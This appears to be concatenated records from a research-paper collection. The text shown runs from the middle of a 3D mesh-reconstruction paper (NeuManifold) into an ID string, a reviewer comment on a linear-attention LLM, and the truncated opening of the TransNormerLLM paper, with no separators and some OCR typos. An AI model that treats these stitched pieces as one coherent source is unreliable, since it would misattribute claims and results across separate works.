with differentiable marching cubes and rasterization. Optionally, when the manifold property is not required, we fine-tune the geometry and appearance by directly moving mesh vertices. Finally, we deploy the pipeline with GLSL shaders for cross-platform real-time rendering and demonstrate the important role of anti-aliasing on visual quality. 3.1 Neural Field Representation. We represent a 3D scene with a geometry network $G$ and an appearance network $A$. In particular, given an arbitrary 3D location $x$, the geometry network outputs its corresponding volume density $\sigma$, and the appearance network regresses a view-dependent color $c$ at the location. This can be expressed by: $$\sigma_x, c_x = G(x), A(x, d)$$ (1) where $d$ is the viewing direction. Our approach supports any common neural field representations for the geometry and appearance networks. In this work, we choose the state-of-the-art neural field representation TensoRF (Chen et al., 2022a) as the network architecture. In order to balance rendering quality and inference speed, we propose two kinds of appearance networks. For the high-quality version, we adopt Vector-Matrix (VM) decomposition plus an MLP. For the fast version, we utilize VM decomposition plus Spherical Harmonics (SH). This can greatly accelerate inference speed on deployment; we discuss this in detail in Sec. 3.5. 3.2 Initialization by Volume Rendering (Stage 1) In the first stage, we train the networks through differentiable volume rendering to establish a strong initialization for the subsequent differentiable rasterization-based optimization phase. As in NeRF, we render pixel colors $C$ using the volume density and view-dependent colors from our geometry and appearance models as: $$C = \sum_{i=1}^{N} T_i (1 - \exp(-\sigma_i \delta_i)) c_i, \quad T_i = \exp(-\sum_{j=1}^{i-1} \sigma_j \delta_j).$$ (2) where $T$ is the volume transmittance and $\delta$ is the ray marching step size. This differentiable rendering process allows us to optimize our networks with a rendering loss. 3.3 Manifold Generation & Optimization (Stage 2) In the second stage of our process, we leverage a similar pipeline as nvdiffrcc (Munkberg et al., 2021) to optimize the object topology, geometry and appearance simultaneously. Unlike nvdiffrcc that directly optimizes the SDF function from scratch, we utilize the pre-trained TensoRF models from the previous stage as initialization. Additionally, we replace the marching algorithm from Differentiable Marching Tetrahedra (DMTet) (Shen et al., 2021) with our Differentiable Marching Cubes (DiffMC), which seamlessly integrates pre-trained density networks into the differentiable rasterization pipeline and significantly reduces artifacts on mesh surfaces. Different from nvdiffrcc, which optimizes SDF values stored on the grid, our methods need to convert the output of the density network to these values, since SDF-based methods tend to exhibit lower visual fidelity and can lose high-frequency details in the geometry. With the pre-trained TensoRF density network, we convert their density into opacity as: $\alpha = 1 - \exp(-\sigma \cdot \delta)$, where $\sigma$ denotes density, $\alpha$ denotes opacity, $\delta$ is the ray step size used in volume rendering. We consider a threshold $t$ that controls the position of the surface with respect to opacity and send the value $\alpha - t$ to DiffMC to obtain our manifold mesh. During the conversion of the density field into a mesh, we encountered notable artifacts with DMTet. These issues arose primarily from the non-linear nature of the density field. As illustrated in Fig. 3, when we apply a non-linear transformation like $\exp()$ to a standard SDF field, the mesh extracted by DMTet develops deformations with peaks and valleys. This happens because the conventional linear interpolation method is no longer adequate for dealing with the non-linear field, and the way it divides space into tetrahedra results in artifacts on surfaces that don’t align well with these tetrahedral divisions. Given that most real-world objects tend to be axis-aligned, adopting an axis-aligned space division can significantly reduce these artifacts. More explanations are in Appendix Sec. B. Therefore, we introduce Differentiable Marching Cubes (DiffMC), which operates on an axis-aligned grid. DiffMC not only extracts the mesh using the conventional marching cubes algorithm (Lorensen & Cline [1998]) but also provides vertex gradients with respect to the grid, denoted as $\frac{\partial v}{\partial g}$. This enables the mesh extraction process to be seamlessly combined with the mesh optimization pipeline using the chain rule: $\frac{\partial L}{\partial \theta} = \sum_{v \in V} \frac{\partial L}{\partial v} \frac{\partial v}{\partial g} \frac{\partial g}{\partial \theta}$, where $L$ is the rendering loss, $\theta$ is the parameters in the density network, $V$ is the set of mesh vertices and $g$ is the grid. In a manner akin to the approach outlined in Shen et al. (2021), we incorporate deformable vectors into the grid that can be optimized. This allows the extracted mesh to adjust more effectively to the desired shape by making subtle adjustments within half of the cube. As shown in Fig. 3, DiffMC is less influenced by the non-linearity and is capable of producing significantly smoother surfaces, even on geometries that are not aligned with the axis. To our best knowledge, we are the first to implement the complete differentiable marching cubes, achieving exceptionally fast speeds that are $10\times$ faster than DMTet. We put the resulting mesh into nvdiffrast (Laine et al. [2020]) to render 2D images and use the rendering loss to update the geometry and appearance networks. Precisely, the points on the mesh surface are passed through the appearance network to generate the output color for each pixel. With a strong initialization from networks pre-trained in volume rendering and the marching cubes algorithm, we are able to get watertight manifold meshes that are more accurate than both volumetric rendering and mesh rendering alone, with better visual quality. ### 3.4 Geometry and Appearance Finetune (Stage 3) The mesh generated in the previous stage is guaranteed to be a watertight manifold, which satisfies the rigorous requirements of common geometry processing algorithms. However, maintaining manifoldness may come at the cost of rendering quality, particularly for areas with intricate structures where preserving both structural details and optimal triangular connections can be challenging. We address this issue with an optional fine-tuning stage to further enhance rendering quality for applications where manifold properties are not necessary. Here, we solely fine-tune the mesh vertex positions and appearance network to improve the rendering loss. While this operation may introduce self-intersections, it preserves the original good edge connections, thus retaining watertightness. ### 3.5 Deployment **GLSL shaders.** Our pipeline produces a triangle mesh with an appearance network consisting of TensoRF and MLPs. This can be directly mapped to a traditional rasterization pipeline as GLSL shaders. We upload TensoRF weights as three 3D textures and three 1D textures with linear filtering, and MLP weights as 2D textures. After rasterizing triangles in the vertex shader, we evaluate TensoRF and MLPs in the fragment shader with model-space coordinates and viewing directions. We further accelerate the deployed rendering pipeline using different MLP size models as well as a spherical harmonics version. We summarize these quality/speed trade-offs in Table 5. **Anti-Aliasing.** Aliasing is a common issue in rasterization pipelines due to the undersampling of high-frequency features, such as mesh edges and detailed textures. In contrast to volumetric rendering, where semi-transparent volumes can mitigate aliasing, mesh-based rendering pipelines are significantly affected by this problem. Supersample anti-aliasing (SSAA) is the most straightforward method to mitigate aliasing; it renders high-resolution images and down-samples them to the target resolution. While SSAA provides the best visual quality, it is computationally expensive due to the increased resolution. An alternative approach is multisample anti-aliasing (MSAA), which is enabled by modern GPU hardware. MSAA reduces the cost of anti-aliasing by increased shader evaluation only on pixels covered by multiple triangles, and it shades each triangle once. It improves visual fidelity at a relatively small performance hit, as shown in Appendix Fig.16. 4 EXPERIMENTS 4.1 IMPLEMENTATION DETAILS For the first stage, we directly build on off-the-shelf volume rendering models. Specifically, for TensoRF, we use the official implementation. We compare two of our models for our main results: a high-quality one, labeled with Ours (HQ), which uses the TensoRF (VM) with 48-dim input features and 12-dim output features, plus a three-layer MLP decoder; a fast one, labeled with Ours (F) that uses the TensoRF (VM) with 48-dim input features and output 27-dim SH coefficients. More details about the network architecture are in supplementary. We train all the stage 2 and 3 models with batch size of 2 for 10k iterations. We use DiffMC with a grid resolution of 256 for all results. Except when comparing with nvdiffrcc, we use the default resolution of 128 as nvdiffrcc’s performance drops on higher resolutions, possibly due to the decreased batch size and harder optimization. 4.2 COMPARISON ON NOVEL-VIEW SYNTHESIS In Table 1, we show a quantitative comparison on novel view synthesis between our method and other neural rendering and differentiable rasterization methods. We perform the experiments on the widely-used NeRF-Synthetic dataset [Mildenhall et al., 2021]. We observe that even though NeuS and TensoRF have very high quality using their original volume rendering, when directly transferred to mesh rendering without any fine-tuning—shown as NeuS (DT) and TensoRF (DT) in the table—they have sharp performance drops. Specifically, we essentially extract meshes from their density or SDF fields and then use them for surface rendering. This involves fetching color information from their appearance networks using surface points. Nvdiffrcc can generate watertight and manifold meshes but its rendering quality has a large gap with other neural rendering methods. In contrast, our models (both high-quality and fast) can achieve high quality on both mesh reconstruction and rendering. It is worth noting that our method attains the highest rendering quality compared to all | Method | Geometry | Mesh | Watertight | Manifold | PSNR↑ | SSIM↑ | LPIPS↓ | |-----------------|----------|------|------------|----------|-------|-------|--------| | NeRF | Volume | X | - | - | 31.00 | 0.947 | 0.081 | | TensoRF | Volume | X | - | - | 33.20 | 0.963 | 0.050 | | NeuS* | Volume | X | - | - | 30.74 | 0.951 | 0.064 | | MobileNeRF | Mesh | ✓ | X | X | 30.90 | 0.947 | 0.062 | | nvdifffrec | Mesh | ✓ | ✓ | X | 28.90 | 0.938 | 0.073 | | nerf2mesh | Mesh | ✓ | ✓ | X | 29.76 | 0.940 | 0.072 | | TensoRF (DT) | Mesh | ✓ | ✓ | ✓ | 25.28 | 0.886 | 0.115 | | NeuS* (DT) | Mesh | ✓ | ✓ | ✓ | 27.85 | 0.935 | 0.074 | | nvdifffrec (m) | Mesh | ✓ | ✓ | ✓ | 27.65 | 0.933 | 0.084 | | Ours (F) | Mesh | ✓ | ✓ | X | 30.94 | 0.952 | 0.061 | | Ours (HQ) | Mesh | ✓ | ✓ | X | **31.65** | **0.956** | **0.056** | | Ours (F-m) | Mesh | ✓ | ✓ | ✓ | 30.47 | 0.949 | 0.065 | | Ours (HQ-m) | Mesh | ✓ | ✓ | ✓ | 31.19 | 0.954 | 0.059 | Table 1. Average results on NeRF-Synthetic dataset. The results of NeRF, MobileNeRF and nerf2mesh are taken from their papers, and the other results for mesh rendering are tested on our machine using Pytorch implementation. (DT: direct transfer) * instant-nsr-pl Guo (2022) implementation. The geometry property is grouped by color. Fig. 5. Visual comparison of mesh quality of different methods. MobileNeRF generates a triangle soup that can only preserve the rough shape. Nvdifffrec gives coarse mesh and fails on some regions. TensoRF is over-detailed and NeuS is over-smoothed. Our method combines the merits of these methods, which is comparable and even better than non-manifold meshes of nerf2mesh. (Non-manifold methods are denoted by *) other surface rendering techniques, surpassing even those that generate non-manifold meshes. In addition, when the manifold property is not required, our visual fidelity can be further boosted with the third stage fine-tuning, leading to an average PSNR 0.65 dB higher than vanilla NeRF. We also show visual comparisons on mesh-based rendering in Fig. 4. We can clearly see that the mesh rendering with meshes directly extracted from NeuS and TensoRF fails to recover the high-frequency details and thin structures in the scene. Moreover, since they apply volume rendering and integrate the colors of multiple points along the ray to match the training images during the optimization, simply extracting the color of a single point at the isosurface cannot faithfully recover the appearance of the scene. Nvdifffrec directly applies mesh rendering during the training, but the recovered meshes can miss complex structures, thus resulting in a degradation in visual quality. In contrast, our method benefits from the initialization from the neural volume rendering and can better recover the fine-grained details of the scene. We also verify the effectiveness of our method on two real datasets, MipNeRF-360 dataset (Barron et al., 2022) and LLFF dataset (Mildenhall et al., 2019). The quantitative results on MipNeRF-360 is shown in Table 2, where our method significantly outperforms other mesh-based methods on indoor scenes. More results are in the Appendix. | Method | Geo. | Outdoor | Indoor | |-----------------|------|---------|--------| | NeRF | Vol | 21.46 | 26.84 | | NeRF++ | Vol | 22.76 | 28.05 | | mip-NeRF | Vol | 24.47 | 31.72 | | Mobile-NeRF | Mesh | 21.95 | - | | BakedSDF | Mesh | **22.47** | **27.06** | | Ours (HQ-m) | Mesh | 21.07 | 25.80 | | Ours (HQ) | Mesh | 22.05 | **27.63** | Table 2. PSNR of Unbounded scenes. More metrics are in the Appendix. Fig. 6. Average VSA-tolerance plot for test views from four NeRF-Synthetic scenes. Depth map of the mesh produced by Ours (HQ-m) achieves high matching scores consistently for different tolerance values. (Non-manifold methods are denoted by dotted line) | G. Init | A. Init | PSNR↑ | SSIM↑ | LPIPS↓ | |---------|---------|-------|-------|--------| | ✗ | ✗ | 20.56 | 0.826 | 0.204 | | ✗ | ✓ | 24.43 | 0.882 | 0.149 | | ✓ | ✗ | 29.74 | 0.945 | 0.067 | | ✓ | ✓ | **31.19** | **0.954** | **0.059** | Table 3. Ablation study for Stage 1. Using initializations from volume rendering enables more accurate mesh reconstruction and rendering, leading to more accurate novel view synthesis. | Geo. + App. | PSNR↑ | SSIM↑ | LPIPS↓ | |-------------|-------|-------|--------| | GT + TF | 31.78 | 0.958 | 0.053 | | TFmesh + MLP | 26.28 | 0.915 | 0.203 | | TFmesh + Hash | 26.62 | 0.921 | 0.090 | | TFmesh + SH | 26.48 | 0.909 | 0.103 | | TFmesh + TF | 27.00 | 0.929 | 0.081 | | TFmesh (opt) + TF | **29.74** | **0.945** | **0.067** | Table 4. Ablation study for Stage 2. Our full method (last row) jointly optimizes geometry and appearance and achieves the best performance. (TF: TensoRF) ### 4.3 Comparison on Mesh Reconstruction We observe that traditional mesh-distance metrics such as Chamfer distance are not suitable for mesh quality comparison, as they are often dominated by the performance of regions unseen during training. To this end, we propose to use the visible surface agreement (VSA) metric, modified from the visible surface discrepancy proposed by Hodaň et al. (2020): $$e_{VSA} = \text{avg}_{p \in V \cup \hat{V}} \begin{cases} 1 & \text{if } p \in V \cap \hat{V} \land |D(p) - \hat{D}(p)| < \tau \\ 0 & \text{otherwise} \end{cases}$$ where given a view, $D$ and $\hat{D}$ denote the depth map of the ground-truth and reconstructed meshes, $V$ and $\hat{V}$ denote the pixel visibility masks, and $\tau$ is the misalignment tolerance. Higher VSA indicates a better match between depth maps. We compare the average VSA metric over 200 testing views of the NeRF-Synthetic dataset with different misalignment tolerances in Fig. 6 (others in Appendix Fig. 18). We additionally provide a visual comparison of the reconstructed meshes in Fig. 5. From the comparisons, we can clearly see that our method achieves consistently better VSA performance than the manifold mesh baseline methods. Our generated meshes better capture the detailed structures of the scene such as the lego wheels, even better than nerf2mesh (Tang et al., 2022) that generates non-manifold ones. ### 4.4 Ablation for Stage 1 & 2 To show the importance and effectiveness of using initialization from volume rendering, we design an ablation study using different initialization methods for Stage 1. As we can see from Table 3, directly optimizing the mesh without initialization from volume rendering, leads to the worst novel view synthesis performance. Both geometry initialization and appearance initialization can boost the accuracy, with geometry initialization playing a more critical role in the performance improvement. Additional visual results in the Appendix Fig. 17 highlight that when high-resolution grids are employed without appropriate geometry initialization, the mesh optimization process can easily become trapped in a local minimum. We validate the necessity of optimizing the meshes in Table 4. To achieve this, we compare against baselines that keep the meshes from Stage 1 fixed and only optimize the appearance. We also provide the results using the GT mesh in combination with the TensorF appearance network as a reference, representing the upper limit of texture optimization methods. As we can see from the results, using the meshes without further optimization achieves much lower accuracy than our full method, Fig. 7. Applications of NeuManifold. (a) Geometry editing with Laplacian surface editing. (b) Appearance editing with vertex painting. (c) Collision shape for cloth simulation. (d) Collision-aware convex decomposition. which demonstrates the essential of jointly optimizing the geometry and appearance in Stage 2. All appearance networks were trained from scratch for fair comparison. 4.5 SPEED AND QUALITY TRADE-OFF We show the model performance and speed after being deployed into GLSL in Table 5 and show the trade-off between model capacity and inference speed. FPS is computed with the average time to render the first frame in the test set of NeRF-Synthetic dataset on an NVIDIA RTX 4090. 5 APPLICATIONS With a manifold mesh-based geometry representation, NeuManifold can be easily plugged into a wide variety of 3D content creation tools. This is a significant advantage over previous neural reconstruction methods and we demonstrate three such applications below. Geometry editing. Geometry editing algorithms often rely on good input mesh connectivity. In Fig. 7, we demonstrate Laplacian surface editing [Sorkine et al., 2004] for non-rigid deformation of the reconstructed microphone. Appearance editing. Our meshes integrate directly into modeling software and can be edited by artists. In Fig. 7p, we load the generated mesh into Blender and paint its vertices. The painted color is multiplied with the original color in the GLSL shader. Physical Simulation. Our reconstructed meshes can be used as static collision meshes for soft-body simulation (e.g., cloth simulation as shown in Fig. 7j) similar to previous works. Moreover, the watertight and manifold properties enable a wider range of applications. For example, they can be used as direct input to the collision-aware convex decomposition algorithm [Wei et al., 2022] for rigid-body collision shape generation (Fig. 7l). They can be directly converted to finite-element meshes by Delaunay tetrahedralizations [Hang, 2015] and used in a finite-element simulation with incremental potential contact (IPC) [Li et al., 2020] (Fig. 1 and Appendix Fig. 12). 6 CONCLUSION We have introduced a novel method for reconstructing high-quality, watertight manifold meshes with accurate rendering support from multi-view images. However, our method currently faces limitations when dealing with specular areas, like the “materials” in NeRF-Synthetic and the “room” in the LLFF dataset. In these cases, the reconstructed meshes may exhibit discontinuities to capture the effect of different colors for the same point seen from different views. We believe that addressing this issue will require the incorporation of inverse rendering techniques and the inclusion of additional priors to ensure a more accurate geometry. | Params | AA | PSNR↑ | SSIM↑ | LPIPS↓ | FPS | |--------|----|-------|-------|--------|-----| | #feat=48 | 8× MS | 30.34 | 0.949 | 0.062 | 93 | | mlp=3×64 | 16× SS | 31.16 | 0.954 | 0.057 | 26 | | #feat=48 | 8× MS | 29.73 | 0.942 | 0.071 | 322 | | mlp=3×16 | 16× SS | 30.49 | 0.947 | 0.064 | 86 | | #feat=12 | 8× MS | 30.11 | 0.946 | 0.066 | 98 | | mlp=3×64 | 16× SS | 30.90 | 0.951 | 0.060 | 27 | | #feat=12 | 8× MS | 29.55 | 0.941 | 0.073 | 585 | | mlp=3×16 | 16× SS | 30.28 | 0.946 | 0.066 | 163 | | #feat=48 | 8× MS | 29.73 | 0.943 | 0.068 | 312 | | SH | 16× SS | 30.44 | 0.949 | 0.063 | 82 | Table 5. Trade-off between rendering speed and quality with different appearance network capacity. 8× MS: 8× sample per-pixel MSAA, 16× SS: 16× sample per-pixel SSAA. REFERENCES Jonathan T Barron, Ben Mildenhall, Matthew Tancik, Peter Hedman, Ricardo Martin-Brualla, and Pratul P Srinivasan. Mip-nerf: A multiscale representation for anti-aliasing neural radiance fields. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 5855–5864, 2021. Jonathan T Barron, Ben Mildenhall, Dor Verbin, Pratul P Srinivasan, and Peter Hedman. Mip-nerf 360: Unbounded anti-aliased neural radiance fields. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 5470–5479, 2022. Sai Bi, Zexiang Xu, Pratul Srinivasan, Ben Mildenhall, Kalyan Sunkavalli, Miloš Hašan, Yannick Hold-Geoffroy, David Kriegman, and Ravi Ramamoorthi. Neural reflectance fields for appearance acquisition. arXiv preprint arXiv:2008.03824, 2020a. Sai Bi, Zexiang Xu, Kalyan Sunkavalli, Miloš Hašan, Yannick Hold-Geoffroy, David Kriegman, and Ravi Ramamoorthi. Deep reflectance volumes: Relightable reconstructions from multi-view photometric images. In European Conference on Computer Vision, pp. 294–311. Springer, 2020b. Sai Bi, Zexiang Xu, Kalyan Sunkavalli, David Kriegman, and Ravi Ramamoorthi. Deep 3d capture: Geometry and reflectance from sparse multi-view images. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 5960–5969, 2020c. Anpei Chen, Zexiang Xu, Andreas Geiger, Jingyi Yu, and Hao Su. Tensorrf: Tensorial radiance fields. In Computer Vision–ECCV 2022: 17th European Conference, Tel Aviv, Israel, October 23–27, 2022, Proceedings. Part XXXII, pp. 333–350. Springer, 2022a. Anpei Chen, Zexiang Xu, Xinyue Wei, Siyu Tang, Hao Su, and Andreas Geiger. Dictionary fields: Learning a neural basis decomposition. ACM Transactions on Graphics (TOG), 42(4):1–12, 2023a. Anpei Chen, Zexiang Xu, Xinyue Wei, Siyu Tang, Hao Su, and Andreas Geiger. Factor fields: A unified framework for neural fields and beyond. arXiv preprint arXiv:2302.01226, 2023b. Zhiqin Chen, Thomas Funkhouser, Peter Hedman, and Andrea Tagliasacchi. Mobilenerf: Exploiting the polygon rasterization pipeline for efficient neural field rendering on mobile architectures. arXiv preprint arXiv:2208.00277, 2022b. Shuo Cheng, Zexiang Xu, Shilin Zhu, Zhuwen Li, Li Erran Li, Ravi Ramamoorthi, and Hao Su. Deep stereo using adaptive thin volume representation with uncertainty awareness. In Proceedings of the CVPR, pp. 2524–2534, 2020. Chong Bao and Bangbang Yang, Zeng Junyi, Bao Hujun, Zhang Yinda, Cui Zhaopeng, and Zhang Guofeng. Neumesh: Learning disentangled neural mesh-based implicit field for geometry and texture editing. In European Conference on Computer Vision (ECCV), 2022. Sara Fridovich-Keil, Alex Yu, Matthew Tancik, Qinhong Chen, Benjamin Recht, and Angjoo Kanazawa. Plenoxels: Radiance fields without neural networks. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 5501–5510, 2022. Yasutaka Furukawa and Jean Ponce. Accurate, dense, and robust multiview stereopsis. IEEE transactions on pattern analysis and machine intelligence, 32(8):1362–1376, 2010. Dan B Goldman, Brian Curless, Aaron Hertzmann, and Steven M Seitz. Shape and spatially-varying brdfs from photometric stereo. IEEE Transactions on Pattern Analysis and Machine Intelligence, 32(6):1060–1071, 2009. Yuanchen Guo. Instant neural surface reconstruction, 2022. https://github.com/bennyguo/instant-nsr-pl/tree/main. Si Hang. Tetgen, a delaunay-based quality tetrahedral mesh generator. ACM Trans. Math. Softw, 41(2):11, 2015.
OROKjdAfjs
In terms of evaluation, although in the abstract, the authors claim that the linearized LLM extends to 175B parameters, most experiments are conducted on 375M models. For the large parameter size settings, the author only reports the memory and latency cost savings. The accuracy information is missing, without which I feel hard to evaluate the linearized LLMs.
TransNormerLLM: A Faster and Better Large Language Model with Improved TransNormer Anonymous authors Paper under double-blind review Abstract We present TransNormerLLM, the first linear attention-based Large Language Model (LLM) that outperforms conventional softmax attention-based models in terms of both accuracy and efficiency. TransNormerLLM evolves from the previous linear attention architecture TransNormer (Qin et al., 2022a) by making advanced modifications that include positional embedding, linear attention acceleration, gating mechanism, tensor normalization, and inference acceleration and stabilization. Specifically, we use LRPPE (Qin et al., 2023b) together with an exponential decay to avoid attention dilution issues while allowing the model to retain global interactions between tokens. Additionally, we propose Lightning Attention, a cutting-edge technique that accelerates linear attention by more than twice in runtime and reduces memory usage by a remarkable four times. To further enhance the performance of TransNormer, we leverage a gating mechanism to smooth training and a new tensor normalization scheme to accelerate the model, resulting in an impressive acceleration of over 20%. Furthermore, we develop a robust inference algorithm that ensures numerical stability and consistent inference speed, regardless of the sequence length, showcasing superior efficiency during both training and inference stages. We also implement an efficient model parallel schema for TransNormerLLM, enabling seamless deployment on large-scale clusters and facilitating expansion to even more extensive models, i.e., LLMs with 175B parameters. We validate our model design through a series of ablations and train models with sizes of 385M, 1B, and 7B on our self-collected corpus. Benchmark results demonstrate that our models not only match the performance of state-of-the-art LLMs with Transformer but are also significantly faster. 1 Introduction The field of Natural Language Processing (NLP) has been revolutionized by the advent of large-scale language models (LLMs) (Touvron et al., 2023a; Biderman et al., 2023; Brown et al., 2020). These models have demonstrated exceptional performance across a multitude of tasks, elevating abilities to comprehend, generate, and interact with human languages in computational frameworks. Previous language modeling development has predominantly centered around Transformer architectures, with seminal models such as vanilla Transformer (Vaswani et al., 2017), GPT series (Radford et al., 2018, 2019; Brown et al., 2020), BERT (Devlin et al., 2019), and BART (Lewis et al., 2019) standing as standard backbones in related fields. The success of Transformer architectures is premised on the softmax attention mechanism, which discerns dependencies among input tokens in a data-driven scheme and has global position awareness, offering the model an effective way to handle the long-range dynamism of natural language. Nevertheless, conventional Transformers are not without their constraints. Primarily, their quadratic time complexity with respect to the sequence length limits their scalability and hampers efficiency in terms of computational resources and time during the training and inference stages. Numerous efficient sequence modeling methods have been proposed in an attempt to reduce the quadratic time complexity to linear (Katharopoulos et al., 2020; Choromanski et al., 2021; Qin et al., 2022b; Zheng et al., 2023; 2022). However, there are two reasons that prohibit them to be applied to LLMs: 1) their performance in language modeling is often unsatisfactory; 2) they do not demonstrate speed advantages in real-world scenarios. In this paper, we introduce TransNormerLLM, the first linear attention-based LLM that surpasses conventional softmax attention in both accuracy and efficiency. The development of TransNormerLLM builds upon the foundations of the previous linear attention architecture, TransNormer (Qin et al., 2022a), while incorporating a series of advanced modifications to achieve superior performance. The key enhancements in TransNormerLLM include positional embedding, linear attention acceleration, gating mechanism, tensor normalization, and inference acceleration. One notable improvement is the replacement of the TransNormer’s DiagAttention with Linear Attention to enhance global interactions. To address the issue of dilution, we introduced LRPE (Qin et al., 2023b) with exponential decay (Press et al., 2022; Qin et al., 2023a; Peng et al., 2023a). Lightning Attention, a novel technique that significantly accelerates linear attention during training is introduced, resulting in a more than two-fold improvement, while also reducing memory usage by four times with IO awareness. Furthermore, we simplified GLU and Normalization, with the latter leading to a 20% speedup. A robust inference algorithm ensures the stability of numerical values and constant inference speed, regardless of the sequence length, thereby enhancing the efficiency of our model during both training and inference stages. We validate the efficacy of TransNormerLLM on our self-collected pre-train corpus that is more than 6TB in size and contains over 2 trillion tokens. We expand the original TransNormer model ranging from 385M to 175B parameters and benchmark models with sizes of 385M, 1B, and 7B. The benchmark results demonstrate that our models achieve competitive performance with existing state-of-the-art Transformer-based LLMs with similar sizes while also having faster inference speeds. We will open-source our pre-trained models, enabling researchers and practitioners to build upon our work and explore efficient transformer structures in LLMs. 2 RELATED WORK 2.1 TRANSFORMER-BASED LLMs In recent years, the field of Large Language Models (LLMs) has experienced significant advancements. Adhering to the scaling laws (Kaplan et al., 2020), various LLMs with over 100 billion parameters have been introduced, such as GPT-3 (Brown et al., 2020), Gopher (Rae et al., 2022), PaLM (Chowdhery et al., 2022), GLM (Du et al., 2022) and etc.. More specialized models like Galactica (Taylor et al., 2022) have also emerged for specific domains like science. A notable development is Chinchilla (Hoffmann et al., 2022), an LLM model with 70 billion parameters that redefines these scaling laws, focusing on the number of tokens rather than model weights. Furthermore, LLaMA (Touvron et al., 2023a) has also sparked interest due to its promising performance and open-source availability. The discourse around LLMs also encompasses the dynamics between open-source and closed-source models. Open-source models such as BLOOM (Workshop et al., 2023), OPT (Zhang et al., 2022), LLaMA (Touvron et al., 2023a), Pythia (Biderman et al., 2023) and Falcon (Penedo et al., 2023) are rising to compete against their closed-source counterparts, including GPT-3 (Brown et al., 2020) and Chinchilla (Hoffmann et al., 2022). To speed up training, Sparse Attention (Child et al., 2019; Beltagy et al., 2020) was introduced, but among large models, only GPT-3 adopted it (Brown et al., 2020; Scao et al., 2022). 2.2 NON-TRANSFORMER-BASED LLMs CANDIDATES Despite the proliferation of Transformer-based large models in the research community, a portion of recent work has prioritized addressing its square time complexity. This focus has led to the exploration and development of a series of model architectures that diverge from the traditional Transformer structure. Among them, four significant contenders—linear transformers, state space model, long convolution, and linear recurrence—have shown promising results as substitutes for self-attention (SA) modules when modeling long sequences. These alternatives are favored for their superior asymptotic time complexity and competitive performances. Linear Transformer Linear Transformer decomposes Softmax Attention into the form of the inner product of hidden representations, which allows it to use the "Right Product Trick," where the product of keys and values is computed to avoid the quadratic $n \times n$ matrix. Different methods utilize various hidden representations. For example, Katharopoulos et al. (2020) use 1+elu as an activation function, Qin et al. (2022b) use the cosine function to approximate the properties of softmax, and Ke et al. approximate softmax through theoretical approaches. Although its theoretical complexity is \(O(nd^2)\), the actual computational efficiency of Linear Attention becomes quite low when used in causal attention due to the need for \(\text{cumsun}\) operations (Hua et al., 2022). On the other hand, most Linear Transformers still exhibit a certain performance gap compared to traditional Transformers (Katharopoulos et al., 2020; Liu et al., 2022). **State Space Model** State Space Model is based on the State Space Equation for sequence modeling (Gu et al., 2022b), using special initialization (Gu et al., 2020; 2022a), diagonalization assumptions (Gupta et al., 2022), and some techniques (Dao et al., 2022b) to achieve performance comparable to Transformers. On the other hand, due to the characteristics of the State Space Equation, it enables inference to be conducted within constant complexity (Gu et al., 2022b). **Long Convolution** Long convolution models (Qin et al., 2023a; Fu et al., 2023) utilize a kernel size equal to the input sequence length, facilitating a wider context compared to traditional convolutions. Training these models involves the efficient \(O(n \log n)\) Fast Fourier Transforms (FFT) algorithm. However, long convolutions pose certain challenges, such as the need for causal convolution inference, which necessitates caching all historical computations similar to SA's key-value (KV) cache. The memory requirements for handling long sequences, coupled with the higher inference complexity compared to RNNs, make them less ideal for processing long sequences. **Linear RNN** Linear RNNs (Orvieto et al., 2023; Peng et al., 2023b), in contrast, stand out as more suitable replacements for SA in long-sequence modeling. A notable example is the RWKV (Peng et al., 2023b) model, a linear RNN-based LLM that has shown competitive performance against similarly scaled GPT models. ### 3 TRANSNormerLLM #### 3.1 ARCHITECTURE IMPROVEMENT In this section, we thoroughly investigate each module of the network and propose several improvements to achieve an optimal balance between efficiency and performance. Below, we outline the key designs of each block along with the inspiration behind each change. For the details of configurations for TransNormerLLM variants from 385M to 175B parameters, see Appendix A. ##### 3.1.1 IMPROVEMENT 1: POSITION ENCODING In TransNormer, DiagAttention is used at the lower layers to avoid dilution issues. However, this leads to a lack of global interaction between tokens. In TransNormerLLM, we leverage LRPE (Qin et al., 2023b) with exponential decay (Press et al., 2022; Qin et al., 2023a; Peng et al., 2023b) to address this issue, retaining full attention at the lower layers. The expression of our position encoding is as follows: \[ a_{st} = q_s^\top k_t \lambda^{s-t} \exp(i\theta(s-t)). \] which we call LRPE-d - Linearized Relative Positional Encoding with exponential decay. Similar to the original LRPE, we set \(\theta\) to be learnable. We empirically find that rather than applying LRPE-d to every layer, applying it to the first layer and keeping other layers with exponential decay can speed up training by approximately 15-20% but only with a subtle effect on the performance. Note that this position encoding is fully compatible with Linear Attention, as it can be decomposed with respect to \(s\) and \(t\) separately. The value of \(\lambda\) for the \(h\)-th head in the \(l\)-th layer (assuming there are a total of \(H\) heads and \(L\) layers) is given by: \[ \lambda = \exp\left(-\frac{s_h}{H} \times \left(1 - \frac{l}{L}\right)\right). \] Here, \(\frac{s_h}{H}\) corresponds to the decay rate of the \(h\)-th head, while \(\left(1 - \frac{l}{L}\right)\) corresponds to the decay rate of the \(l\)-th layer. The term \(\left(1 - \frac{l}{L}\right)\) ensures that the Theoretical Receptive Fields (TRF) (Qin et al., 2023c) at the lower layers is smaller compared to the higher layers, which aligns with TransNormer's motivation. It should be noted that the decay rate in the last layer is set to 1, allowing each token to attend to global information. We choose \(\lambda\) to be non-learnable since we empirically found that gradients become unstable when \(\lambda\) is learnable, leading to NaN values. 3.1.2 Improvement 2: Gating mechanism Gate can enhance the performance of the model and smooth the training process. In TransNormer-LLM, we adopted the approach from Flash (Hua et al., 2022) and used the structure of Gated Linear Attention (GLA) in token mixing: TokenMixer : \( O = \text{Norm}(QK^\top V) \odot U, \) where: \( Q = \phi(XW_q), K = \phi(XW_k), V = XW_v, U = XW_u. \) We choose \( \phi \) to be swish (Ramachandran et al., 2017) activation function as we empirically find that it outperforms other activation functions, as shown in Table 6. To further accelerate the model, we propose Simple GLU (SGLU), which removes the activation function from the original GLU structure as the gate itself can introduce non-linearity. Therefore, our channel mixing becomes: ChannelMixer : \( O = [V \odot U]W_o, V = XW_v, U = XW_u, \) We empirically find that not using an activation function in GLU will not lead to any performance loss, as demonstrated in Table 7. 3.1.3 Improvement 3: Tensor normalization We employ the NormAttention 